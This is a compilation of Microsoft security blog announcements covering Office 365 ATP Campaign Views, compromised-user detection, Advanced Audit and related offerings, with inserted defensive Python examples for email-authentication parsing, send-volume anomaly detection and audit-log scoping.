Terranova Security’s catalog impresses not only in its intellectual quality and engaging experience, but also in its comprehensive breadth. It provides the most enterprise-ready library of content in the marketplace, featuring trainings of every duration, covering all the social engineering variants across the spectrum. This allows Microsoft to leverage insights from our email threat protection solution, Office 365 Advanced Threat Protection (Office 365 ATP) to personalize phish training—delivering the right training to the right users at the right time for maximum efficacy. The automation and integration built into Office 365 Advanced Threat Protection will leverage and target phish training content to deliver a seamless, context-aware and engaging user experience for all our customers. Insights generated will flow into analytics and recommendations that will help our customers customize and differentiate phish training for maximum effect within their organizations. The market has outgrown one-size-fits-all solutions, and end users expect interactive, engaging content that adapts to their learning needs. Terranova Security meets this.


Finally, both Terranova Security and Microsoft share a commitment to diverse and inclusive practices. Terranova Security builds inclusion into their boardroom, their content and their products and services. Terranova Security’s content library is available in 40 different languages, enabling training across geographies and . Further, Terranova Security’s content will meet Level A Success Criteria of the Web Content Accessibility Guidelines Version 2.1, the highest bar of accessible content available. All of this means that any organization in the world will be able to benefit from this security awareness training content. Microsoft strives to serve customers from all over the world, with different perspectives and needs. Terranova Security’s focus on diversity and inclusion bolsters our ability to deliver industry-leading experiences for all our customers.


We believe that this partnership will enable us to address our customers’ most significant and impactful risk vectors: phishing driving risky end user behaviors. The combination of Microsoft technology to target the right training at the right coupled with Terranova Security’s human-centric approach will deliver an industry-leading phishing simulation and training experience. The solution will raise the efficacy bar for phishing training to new heights and will shift your users from being part of the problem to part of the solution.

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Announcing GA of O365 ATP Campaign Views and Compromised User Detection and Response

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

Today, I’m thrilled to announce the general availability of two extremely popular and valuable features in the Office 365 Advanced Threat Protection offering: Campaign Views and Advanced Compromised user detection and response. These features together greatly amplify the protection of organizations by helping security teams detect compromised users sooner, identify configuration weaknesses faster and improve security posture. And they also help reduce the scope of impact of breaches by giving security teams the tools to respond quickly.


Campaign views:



When we released Campaign Views into public preview a few months ago, we already knew it was an extremely popular and useful capability for security teams, based on the overwhelmingly positive feedback from our close design customer partners. Campaign views offer security teams the full story of how attackers targeted the organization and its users and how their defenses held up (or not).

Security teams can quickly:

  • See summary details about the campaign, including when the campaign started, the sending pattern and timeline, how big the campaign was and how many users fell prey to it.
  • See the list of IP addresses and senders used to orchestrate the attack.
  • Assess which messages were blocked, ZAPped, delivered to junk or quarantine, or allowed into the inbox.
  • See all the URLs that were used in the attack.
  • Learn whether any users fell prey to the attack and clicked on the phish URL.

Armed with the information above, security teams can more effectively and efficiently:

  1. Remediate compromised or vulnerable users
  2. Improve security posture by eliminating the configuration flaws observed
  3. Investigate related campaigns that use the same indicators of compromise
  4. Hunt and track threats that use the same indicators of compromise


Amazing feedback:

Over the past few months in public preview, we've had extremely positive feedback on the feature.

“Being able to piece together the big picture of phishing attacks spread out over multiple days and with subtle changes in tactics of the campaigns, is extremely powerful”

“I’ve now started using this as one of the starting points for my hunting and investigation. And I keep coming back every few days to see what’s new and what I need to focus on”

Comments like the above are music to our ears and we’ve been hearing it from many customers that have been using Campaign Views in preview.


Tangible value:

It is no wonder that customers love this feature. Just consider the following stories.

For one large customer, visibility into the complexity of a small number of recurring, detected campaigns helped them identify and understand a set of persistent, targeted attacks against a specific R&D department.

Another tenant prioritized a full review of their decade-old configuration settings after they saw a campaign that completely bypassed filtering and allowed message delivery into their organization. It turns out that the campaign was allowed by a previously unknown and unrecognized Exchange mail flow rule (also known as a transport rule or ETR).

As we engage with customers, we continue to hear stories like this that make using campaign views as part of the SecOps workflows extremely compelling.


Additional improvements:

As part of the GA release we’ve also made additional improvements to Campaign views.

Improved discoverability: Campaign views are a separate node in the left navigation panel of the O365 Security and Compliance portal under ‘Threat Management’.




Expanded search and investigation capabilities: We’ve made it easier to search across campaigns. For example, you can search for all campaigns that targeted a specific recipient (for example, your company’s CEO) or campaigns related to a particular email (search for subject keywords or the specific messageID).



More campaign details: For each campaign, more information is now presented.

  • Click-rate: As a way to measure the effectiveness of the campaign (from the attacker's perspective), or in other words the impact of the campaign on the organization, we now show a click-rate. Click-rate is the percentage of Inbox'ed messages (messages delivered to the Inbox) that received a click from the recipient. This is an indirect measurement of how effective and convincing the social engineering aspect of the campaign was.



  • Authentication details: Within the Campaign view, we show expanded authentication details: all email authentication protocols (SPF for sending IPs, DKIM and DMARC for senders). Authentication failures identify attackers that are spoofing senders. Passing these authentication checks indicates a legitimate email sending infrastructure is being used for these attacks (for example, compromise or abusive activities that would require different action plans).
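As an added example that is not part of Microsoft's post or of the ATP product itself, the following Python sketch reproduces the two measures described above over a constructed sample of campaign messages: it parses the SPF, DKIM and DMARC verdicts from each message's Authentication-Results header to separate spoofed senders from authenticated sending infrastructure (the "different action plans" case), and it computes the click-rate as the share of inbox-delivered messages that received a click. The message records, campaign ids and disposition vocabulary are assumptions made for the example, not fields of the Campaign Views API.

```python
import re
from typing import Dict, List

# Constructed sample data for this added example (invented; not ATP output).
# Each entry is one message seen in a campaign: where the filter put it,
# whether the recipient clicked the URL, and the Authentication-Results
# header the receiving server stamped on it.
SAMPLE_MESSAGES: List[Dict] = [
    {"campaign": "camp-A", "disposition": "inbox", "clicked": True,
     "auth_results": "spf=fail (sender IP is 203.0.113.7) smtp.mailfrom=contoso.example; "
                     "dkim=none (message not signed); dmarc=fail action=none header.from=contoso.example"},
    {"campaign": "camp-A", "disposition": "inbox", "clicked": False,
     "auth_results": "spf=fail smtp.mailfrom=contoso.example; dkim=none; dmarc=fail header.from=contoso.example"},
    {"campaign": "camp-A", "disposition": "junk", "clicked": False,
     "auth_results": "spf=fail smtp.mailfrom=contoso.example; dkim=none; dmarc=fail header.from=contoso.example"},
    {"campaign": "camp-A", "disposition": "blocked", "clicked": False,
     "auth_results": "spf=fail smtp.mailfrom=contoso.example; dkim=none; dmarc=fail header.from=contoso.example"},
    {"campaign": "camp-B", "disposition": "inbox", "clicked": True,
     "auth_results": "spf=pass smtp.mailfrom=partner.example; dkim=pass header.d=partner.example; dmarc=pass header.from=partner.example"},
    {"campaign": "camp-B", "disposition": "inbox", "clicked": True,
     "auth_results": "spf=pass smtp.mailfrom=partner.example; dkim=pass header.d=partner.example; dmarc=pass header.from=partner.example"},
    {"campaign": "camp-B", "disposition": "inbox", "clicked": False,
     "auth_results": "spf=pass smtp.mailfrom=partner.example; dkim=pass header.d=partner.example; dmarc=pass header.from=partner.example"},
    {"campaign": "camp-B", "disposition": "quarantine", "clicked": False,
     "auth_results": "spf=pass smtp.mailfrom=partner.example; dkim=pass header.d=partner.example; dmarc=pass header.from=partner.example"},
]

# Matches the "spf=pass", "dkim=fail", "dmarc=none" verdict tokens only;
# property tokens such as header.from=... or action=none are ignored.
_AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.IGNORECASE)


def parse_auth_results(header: str) -> Dict[str, str]:
    """Extract the SPF/DKIM/DMARC verdicts from an Authentication-Results header."""
    verdicts = {"spf": "none", "dkim": "none", "dmarc": "none"}
    for mechanism, result in _AUTH_RE.findall(header):
        verdicts[mechanism.lower()] = result.lower()
    return verdicts


def classify_sender(verdicts: Dict[str, str]) -> str:
    """Spoofed senders fail authentication; a full pass means real, possibly
    compromised or abused, sending infrastructure is behind the campaign."""
    if verdicts["dmarc"] == "fail" or verdicts["spf"] == "fail":
        return "spoofed"
    if all(verdicts[m] == "pass" for m in ("spf", "dkim", "dmarc")):
        return "authenticated-infrastructure"
    return "unverified"


def click_rate(messages: List[Dict], campaign: str) -> float:
    """Percentage of inbox-delivered messages in the campaign that were clicked."""
    inboxed = [m for m in messages if m["campaign"] == campaign and m["disposition"] == "inbox"]
    if not inboxed:
        return 0.0
    clicked = sum(1 for m in inboxed if m["clicked"])
    return round(100.0 * clicked / len(inboxed), 1)


def summarize_campaigns(messages: List[Dict]) -> Dict[str, Dict]:
    """Per-campaign summary: message dispositions, click-rate and sender class."""
    summary = {}
    for camp in sorted({m["campaign"] for m in messages}):
        msgs = [m for m in messages if m["campaign"] == camp]
        dispositions: Dict[str, int] = {}
        for m in msgs:
            dispositions[m["disposition"]] = dispositions.get(m["disposition"], 0) + 1
        sender_classes = sorted({classify_sender(parse_auth_results(m["auth_results"])) for m in msgs})
        summary[camp] = {
            "messages": len(msgs),
            "dispositions": dispositions,
            "click_rate_pct": click_rate(messages, camp),
            "sender_class": sender_classes,
        }
    return summary


if __name__ == "__main__":
    for camp, info in summarize_campaigns(SAMPLE_MESSAGES).items():
        print(camp, info)
```

In the sample, camp-A fails SPF and DMARC (spoofing) and half of its inbox-delivered messages were clicked, while camp-B passes all three checks, so the response there starts with the sending domain's owner rather than with anti-spoofing controls.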



Campaign Views is GA!

Campaign Views will be immediately available to all customers with Office 365 ATP P2 and Office 365 E5 subscriptions. We encourage you to start using this powerful new set of capabilities to understand, mitigate and remediate phishing attacks. To learn more, see Campaign Views in Office 365 ATP.



Advanced Compromised user detection and response:





User accounts continue to have immense value for attackers. By compromising an account the attacker gains a foothold into the organization, using which they look to proliferate the attack, build avenues for the delivery of additional spam and phish campaigns, target additional users within the organization, steal sensitive data, or hold the organization to ransom.

This is why organizations need a sound protection strategy that focuses not only on prevention, but also on early detection of, and response to, account compromise and breaches.

The attacker’s activities when using a compromised account are often atypical or anomalous relative to the user’s regular behavior. For instance, there is no good reason for trusted users to be sending any phish or spam emails to other recipients. Being able to detect anomalies in user activity is therefore a key signal source for detection.

A few months ago, we released several features to detect anomalies in user activity to expand on our detection of user compromise. And we also released into preview a compelling automated playbook to automatically investigate such threats to help security teams more effectively and comprehensively detect the source and impact of the compromise and take remediation actions.
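To make the anomaly idea concrete, here is an added Python example (not Microsoft's detection logic, and not from the post) that applies a robust baseline to constructed daily outbound-mail counts per user. It scores each user's latest day against the median and median absolute deviation of their own history, so one-off spikes like a compromised account suddenly sending hundreds of messages stand out, while an absolute floor keeps low-volume users from being flagged on noise. The counts, threshold and floor are assumptions chosen for the example.

```python
import statistics
from typing import Dict, List, Tuple

# Constructed daily outbound-mail counts per user over 14 days (invented sample
# data for this example). The last value in each series is "today"; the earlier
# values are that user's baseline history.
OUTBOUND_COUNTS: Dict[str, List[int]] = {
    "alice@contoso.example": [12, 15, 9, 14, 11, 13, 10, 12, 16, 11, 14, 12, 13, 240],
    "bob@contoso.example":   [30, 28, 35, 31, 29, 33, 30, 32, 27, 31, 30, 34, 29, 36],
    "carol@contoso.example": [0, 1, 0, 0, 2, 0, 1, 0, 0, 1, 0, 0, 1, 8],
}

# Scale factor that makes the MAD comparable to a standard deviation for
# normally distributed data.
_MAD_TO_SIGMA = 1.4826


def robust_baseline(history: List[int]) -> Tuple[float, float]:
    """Median and median absolute deviation of a user's own send history."""
    median = statistics.median(history)
    mad = statistics.median(abs(x - median) for x in history)
    return median, mad


def anomaly_score(value: int, history: List[int]) -> float:
    """Robust z-score of today's count against the user's baseline.
    A MAD of zero (a very quiet user) falls back to a unit scale so the
    division stays defined; the absolute floor below handles that case."""
    median, mad = robust_baseline(history)
    scale = _MAD_TO_SIGMA * mad if mad > 0 else 1.0
    return (value - median) / scale


def detect_send_spikes(counts: Dict[str, List[int]],
                       threshold: float = 3.5,
                       floor: int = 50) -> Dict[str, float]:
    """Return users whose latest day is both far above their own baseline
    (score > threshold) and large in absolute terms (>= floor messages)."""
    findings: Dict[str, float] = {}
    for user, series in counts.items():
        history, today = series[:-1], series[-1]
        score = anomaly_score(today, history)
        if score > threshold and today >= floor:
            findings[user] = round(score, 1)
    return findings


if __name__ == "__main__":
    for user, score in detect_send_spikes(OUTBOUND_COUNTS).items():
        print(f"possible compromise: {user} (robust z = {score})")
```

Only alice is flagged: bob's 36 messages score above the threshold relative to his tight baseline but sit under the absolute floor, and carol's quiet history gives a zero MAD that the floor absorbs. In practice the same scoring is applied to several signals at once (recipients outside the organization, messages later reported as phish, sends at unusual hours), not to raw volume alone.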


Amazing impact:

The power of these new capabilities has been immediately apparent. In the past few months, we’ve seen a 5x increase in the number of user compromises detected and responded to by customers using this feature.

If you consider the average cost of a data breach to organizations (~$4M globally, per some studies), with estimates being higher in certain geographies (some estimates reaching as high as $10M in regions like the US), any time security teams can detect and respond to compromised users faster and prevent costly data breaches is a critical win for the organization, its employees, its partners and its customers.


Continuous stream of improvements:

As a lead-up to GA, we've also been working to continually expand and tune our detections to more accurately detect compromise, highlight exfiltration of data and improve the efficiency of SecOps teams. While this GA announcement marks a compelling checkpoint for leveraging this feature more confidently, we'll continue to expand the types of detections and SecOps capabilities we introduce into this feature.


Compromised user detection and response is GA!

The compromise detections and alerts are available to all customers. The advanced automated playbooks for automatic investigation and response for compromised users, which give a more effective and efficient analysis of the cause and impact of the compromise, are generally available today to all customers with Office 365 ATP P2 and Office 365 E5 subscriptions. We encourage you to start using this powerful new set of capabilities to stop attack kill-chains early and reduce the impact and scope of breaches. To learn more, see the documentation related to compromised user response.



Try it for yourself!


If you've not checked out these capabilities yet, I strongly encourage you to do so. The combination of campaign views and compromised user detection and response helps reduce the scope of impact of breaches by giving security teams the tools to detect compromised users sooner, identify configuration weaknesses easily, respond faster and more effectively, and improve security posture. Go on, give it a try. We'd love to hear what you think.




Power faster and more effective forensic and compliance investigations

We are pleased to share that Advanced Audit for Microsoft 365 is now rolling out. The new set of capabilities is aimed at powering faster and more effective forensic and compliance investigations.


These updates include:

  • Extending the preservation of a user’s audit activities from 90 days to 1 year
  • Increasing bandwidth access to the Management Activity API
  • Access to crucial events for investigations

Longer-term retention

Currently, audit logs are retained for 90 days by default. With Advanced Audit you are now able to retain audit logs for more than 90 days and up to 1 year for eligible users.


To apply the custom retention policy, within the audit log search, you can create a new retention policy and choose the appropriate duration within the UI or through cmdlets. You can also add more policies or customize existing ones. More details are available here.


[Image: Add a new retention policy for an individual user's audit log activities for up to 1 year]


Faster access to data

In the past, customers consuming logs through the Office 365 Management Activity API were limited by throttling limits at the publisher level, which means that for a publisher pulling data on behalf of multiple customers, the limit was shared by all those customers.


With this release, we are moving from publisher-based to tenant-based limits so each tenant will get their fully allocated bandwidth quota to access their auditing data. The bandwidth will be determined by a combination of factors including the number of seats in the tenant and their license subscription.


All tenants will start with a baseline of 2,000 requests per minute and will go up depending on their seat count, and E5 customers with Advanced Audit will get more bandwidth than non-E5 customers to provide faster access to data. Note that there will also be an upper cap for bandwidth to protect the health of the service. You can learn more from our documentation here.


Access crucial events for investigations

With Advanced Audit, one of the first events we are releasing is MailItemsAccessed. With this new event, access to data over mail protocols and clients will be audited to help investigators better understand the scope of a compromise.


The new MailItemsAccessed action is exposed as a part of Exchange Mailbox Auditing and is enabled by default. You can learn more from our documentation here.
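The following Python example is added here to show how an investigator would turn MailItemsAccessed records into a scope-of-compromise summary for one account over a suspected window; it is not Microsoft's tooling and is not from the post. The audit records are constructed, and their field names (OperationProperties carrying MailAccessType and IsThrottled, Folders carrying FolderItems with an InternetMessageId, plus SessionId and ClientIPAddress) follow the general shape of unified audit log records as I understand them and should be treated as assumptions rather than a schema guarantee.

```python
import json
from datetime import datetime
from typing import Dict, List, Set

# Constructed sample audit records for this added example (invented; not real
# audit log output). Field names are assumptions, see the lead-in above.
SAMPLE_AUDIT_JSON = """
[
  {"CreationTime": "2020-02-21T08:15:00", "Operation": "MailItemsAccessed",
   "UserId": "alice@contoso.example", "ClientIPAddress": "203.0.113.50",
   "SessionId": "sess-aaa", "ClientInfoString": "Client=OWA;Action=ViaProxy",
   "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"},
                           {"Name": "IsThrottled", "Value": "False"}],
   "Folders": [{"Path": "Inbox", "FolderItems": [
       {"InternetMessageId": "<m1@contoso.example>"},
       {"InternetMessageId": "<m2@contoso.example>"}]}]},
  {"CreationTime": "2020-02-21T08:20:00", "Operation": "MailItemsAccessed",
   "UserId": "alice@contoso.example", "ClientIPAddress": "203.0.113.50",
   "SessionId": "sess-aaa", "ClientInfoString": "Client=OWA;Action=ViaProxy",
   "OperationProperties": [{"Name": "MailAccessType", "Value": "Sync"},
                           {"Name": "IsThrottled", "Value": "False"}],
   "Folders": [{"Path": "Sent Items", "FolderItems": []}]},
  {"CreationTime": "2020-02-21T09:05:00", "Operation": "MailItemsAccessed",
   "UserId": "alice@contoso.example", "ClientIPAddress": "198.51.100.9",
   "SessionId": "sess-bbb", "ClientInfoString": "Client=REST;Client=RESTSystem",
   "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"},
                           {"Name": "IsThrottled", "Value": "True"}],
   "Folders": [{"Path": "Inbox", "FolderItems": [
       {"InternetMessageId": "<m2@contoso.example>"},
       {"InternetMessageId": "<m3@contoso.example>"}]}]},
  {"CreationTime": "2020-02-20T17:00:00", "Operation": "MailItemsAccessed",
   "UserId": "alice@contoso.example", "ClientIPAddress": "203.0.113.50",
   "SessionId": "sess-old", "ClientInfoString": "Client=OWA;Action=ViaProxy",
   "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"},
                           {"Name": "IsThrottled", "Value": "False"}],
   "Folders": [{"Path": "Inbox", "FolderItems": [
       {"InternetMessageId": "<m0@contoso.example>"}]}]},
  {"CreationTime": "2020-02-21T10:00:00", "Operation": "MailItemsAccessed",
   "UserId": "bob@contoso.example", "ClientIPAddress": "203.0.113.51",
   "SessionId": "sess-ccc", "ClientInfoString": "Client=OWA;Action=ViaProxy",
   "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"},
                           {"Name": "IsThrottled", "Value": "False"}],
   "Folders": [{"Path": "Inbox", "FolderItems": [
       {"InternetMessageId": "<m9@contoso.example>"}]}]}
]
"""


def load_audit_records(raw_json: str) -> List[Dict]:
    """Parse an exported batch of audit records (a JSON array)."""
    return json.loads(raw_json)


def scope_of_mail_access(records: List[Dict], user: str,
                         window_start: str, window_end: str) -> Dict:
    """Summarize which messages and folders a user's sessions touched inside a
    suspected-compromise window, grouped by session so an investigator can tell
    the owner's own activity from an attacker's session."""
    start, end = datetime.fromisoformat(window_start), datetime.fromisoformat(window_end)
    items: Set[str] = set()
    sync_folders: Set[str] = set()
    sessions: Dict[str, Dict] = {}
    throttled = False
    for rec in records:
        if rec.get("Operation") != "MailItemsAccessed" or rec.get("UserId") != user:
            continue
        if not start <= datetime.fromisoformat(rec["CreationTime"]) <= end:
            continue
        props = {p["Name"]: p["Value"] for p in rec.get("OperationProperties", [])}
        access_type = props.get("MailAccessType", "Unknown")
        # A throttled record does not list every item that was accessed, so the
        # item set below is a lower bound once any record in the window is throttled.
        if props.get("IsThrottled") == "True":
            throttled = True
        session = sessions.setdefault(rec.get("SessionId", "unknown"), {
            "ip": rec.get("ClientIPAddress"),
            "client": rec.get("ClientInfoString"),
            "access_types": set(),
        })
        session["access_types"].add(access_type)
        for folder in rec.get("Folders", []):
            if access_type == "Sync":
                sync_folders.add(folder.get("Path", ""))
            for item in folder.get("FolderItems", []):
                items.add(item["InternetMessageId"])
    return {
        "user": user,
        "items_read": sorted(items),
        "sync_folders": sorted(sync_folders),
        "sessions": {sid: {"ip": s["ip"], "client": s["client"],
                           "access_types": sorted(s["access_types"])}
                     for sid, s in sessions.items()},
        "throttled": throttled,
    }


def sessions_from_unexpected_ips(scope: Dict, known_ips: Set[str]) -> List[str]:
    """Session ids in the summary whose client IP is not in the user's known set."""
    return sorted(sid for sid, s in scope["sessions"].items() if s["ip"] not in known_ips)


if __name__ == "__main__":
    recs = load_audit_records(SAMPLE_AUDIT_JSON)
    scope = scope_of_mail_access(recs, "alice@contoso.example",
                                 "2020-02-21T00:00:00", "2020-02-21T23:59:59")
    print(json.dumps(scope, indent=2))
    print("sessions from unexpected IPs:", sessions_from_unexpected_ips(scope, {"203.0.113.50"}))
```

The Sync records matter as much as the Bind ones: a sync of a whole folder means every item in it should be treated as exposed even though no individual message ids are listed, and the throttled flag tells the investigator the item list is incomplete and must be supplemented from other sources.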


[Image: users can now see audit activity such as the MailItemsAccessed event]


Get Started

For Microsoft 365 E5 customers, Advanced Audit is rolling out over the next few weeks. You can also sign up for a trial or navigate to the Microsoft 365 compliance center to get started today. 


Learn more about what’s new with Advanced Audit and how to configure policies in your tenant in this supporting documentation. We look forward to hearing your feedback.

[UPDATED] Introducing remote deployment guidance for Microsoft Defender ATP and Office 365 ATP

In today’s heterogeneous environments, security is becoming more and more complex. Customers are facing a growing attack surface and need help speeding up deployment of their protection tools at scale. To help security teams address these complexities and better protect, detect and respond to threats faster, we are excited to announce Microsoft FastTrack remote deployment guidance for Microsoft Defender Advanced Threat Protection (ATP), our unified endpoint security platform for proactive threat protection, post-breach detection, automated investigation, and response. We are also announcing an expanded FastTrack scope for Office 365 Advanced Threat Protection, which protects customers against sophisticated threats like phishing and malware with automated investigation and remediation.


Microsoft Defender ATP and Office 365 ATP are two critical components of the suite of Microsoft security products that work seamlessly together to provide protection across the entire attack kill chain, using built-in intelligence from the Microsoft Intelligent Security Graph to protect identities, email, applications, endpoints, and data from evolving threats.




At Microsoft, we are fully committed to helping customers realize the value of our Microsoft 365 security solutions by deploying them more quickly to address their business needs. FastTrack is responsible for making this commitment a reality by advising and supporting customers during the deployment of their technologies. We are now expanding the support we already provide for securing identities to email and endpoints with remote deployment guidance for customers that want to leverage advanced tools to secure their email and endpoints. Together, identity, email and endpoints represent the three most common entry points for attackers.


Microsoft FastTrack enables customers to deploy Microsoft 365 security solutions at no additional cost for eligible subscriptions in North America. FastTrack has an engagement model built on learnings and expertise gained through engineering work with more than 60,000 customers since 2014. We use and share these best practices as part of a deployment process that enables customers to onboard to new services quickly and reliably.


The FastTrack team provides remote guidance, engaging directly with customers or partners. This is an ongoing benefit throughout the life of the subscription, delivered by Microsoft and approved partners.


To request assistance, visit

How to prevent and expose “unknown unknown” threats


Check out the joint Microsoft and Morphisec webinar next Tuesday, November 19, at 10am EST, where two rockstar women in cybersecurity will show you how to prevent and expose “unknown unknown” threats through an integration of Morphisec’s Moving Target Defense with Microsoft Defender ATP.


To register and learn more, click here


Looking forward to seeing you next week!
